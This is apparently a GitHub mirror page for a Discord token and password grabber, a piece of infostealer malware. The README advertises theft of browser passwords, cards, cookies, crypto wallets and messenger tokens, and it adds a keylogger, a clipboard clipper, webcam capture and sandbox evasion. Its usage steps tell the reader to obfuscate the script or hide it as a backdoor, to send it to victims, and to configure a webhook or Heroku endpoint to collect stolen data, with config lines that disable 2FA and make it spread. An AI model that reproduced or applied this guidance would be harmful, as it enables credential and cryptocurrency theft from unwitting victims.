Git Product home page Git Product logo

ilikebaco / discord-image-token-password-grabber-exploit-cve-2022 Goto Github PK

View Code? Open in Web Editor NEW
0.0 0.0 0.0 603 KB

Get system info (Version, CPU, GPU, RAM, IPs, BSSID, Location, Screen metrics, Installed apps) Chromium based browsers (passwords, credit cards, cookies, history, autofill, bookmarks) Firefox based browsers (db files, cookies, history, bookmarks) Internet explorer/Edge (passwords) Saved wifi networks & scan networks around device (SSID, BSSID) s File grabber (Documents, Images, Source codes, Databases, USB) Detect banking & cryptocurrency services in browsers Steam, Uplay, Battle.Net, Minecraft session Install keylogger & clipper Desktop & Webcam screenshot

C++ 33.64% Python 9.14% C# 57.05% Batchfile 0.18%

discord-image-token-password-grabber-exploit-cve-2022's Introduction

Discord-Image-Token-Password-Grabber-Exploit-Cve-2022

AntiAnalysis (VirtualBox, SandBox, Debugger, VirusTotal, Any.Run)

image

Get system info (Version, CPU, GPU, RAM, IPs, BSSID, Location, Screen metrics, Installed apps)

Chromium based browsers (passwords, credit cards, cookies, history, autofill, bookmarks)

Firefox based browsers (db files, cookies, history, bookmarks) Internet explorer/Edge (passwords)

Saved wifi networks & scan networks around device (SSID, BSSID) s File grabber (Documents, Images, Source codes, Databases, USB)

Detect banking & cryptocurrency services in browsers

Steam, Uplay, Battle.Net, Minecraft session

Install keylogger & clipper

Desktop & Webcam screenshot

image

ProtonVPN, OpenVPN, NordVPN s Crypto Wallets

Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, AtomicWallet, Guarda, Coinomi, Litecoin, Dash, Bitcoin

Crypto Wallet Extensions from Chrome & Edge Binance, coin98, Phantom, Mobox, XinPay, Math10, Metamask, BitApp, Guildwallet, iconx, Sollet, Slope Wallet, Starcoin, Swash, Finnie, KEPLR, Crocobit, OXYGEN, Nifty, Liquality, Auvitas wallet, Math wallet, MTV wallet, Rabet wallet, Ronin wallet, Yoroi wallet, ZilPay wallet, Exodus, Terra Station, Jaxx.

Messenger Sessions, Accounts, Tokens Discord, Telegram, ICQ, Skype, Pidgin, Outlook, Tox, Element, Signal

Directories structure Filezilla hosts Process list Product key Autorun module

๐ŸŽน Keylogger: The keylogger will turn on if the user is texting in the chat or using the bank's website.

๐Ÿ“‹ Clipper: Clipper turns on and replaces crypto wallet addresses in the clipboard when a user makes a transaction.

๐Ÿ“ท Webcam screenshots: Webcam screenshots will be taken if the user is watching something obscene on the Internet.

Features

  • No local caching
  • Transfers via Discord webhook
  • Searches for authorization tokens in multiple directories (Discord, Discord PTB, Discord Canary, Google chrome, Opera, Brave and Yandex)
  • No external Python modules required
  • [todo] Cross-platform support

How to use

  1. Create a webhook on your Discord server. I recommend creating a new server.
  2. Change the 'WEBHOOK_URL' variable value to your Discord webhook URL in token-grabber.py
  3. (obfuscate the code or install it as a backdoor in an other script.)
  4. Send the script to your victim and make them run it.

Features

  • Steal Discord info
    • Username
    • E-mail
    • Phone Number
    • Nitro Type
    • ID
  • Steal Discord token
    • Discord
    • Discord PTB
    • Discord Dev
  • Steal Discord Password : When you change password & When you change e-mail & When you log-in in your discord account
    • Discord
    • Discord PTB
    • Discord Dev

How to use

#1 : API Hosting

Method 1 : (require a vps)

Open port 80

Install Apache2 :

$ sudo apt-get update
$ sudo apt-get install apache2

Test server :

$ curl urserverurl

Configure Firewall :

$ sudo ufw allow 'Apache'

Verify the change :

$ sudo ufw status

Install API :

$ git clone https://github.com/Stanley-GF/api.git

Configure port & ip in the main index.js

$ cd api
$ nano index.js

Configure webhook url :

$ cd api/endpoints
$ nano index.js

Your API URL gonna be : http://your-vps-ip/api/v1/send (replace your-vps-ip by ur real vps ip, obviously)

Method 2 : Heroku (the best for beginner)

#2 : Your .exe

  • Download src of this project
  • Open project
  • Go in settings.cs and configure option :
public static bool disableMfa = false; // disable 2FA 

public static bool restartDiscord = true; // restart discord after injection

public static bool spread = true; // ALWAYS TRUE : (for infect client)

private static string serverurl = "https://your-app-name.herokuapp.com/api/v1/send"; // replace "your-app-name.herokuapp.com/api/v1/send" by your api url

public static string Url = "https://cors-anywhere2.herokuapp.com/" + serverurl; // don't tuch.
  • Compile the project
  • Go in \HS-Grabber\HS-Grabber\bin\Debug
  • Send the .exe to victims !

Some screenshot of the grabber

yay

discord-image-token-password-grabber-exploit-cve-2022's People

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.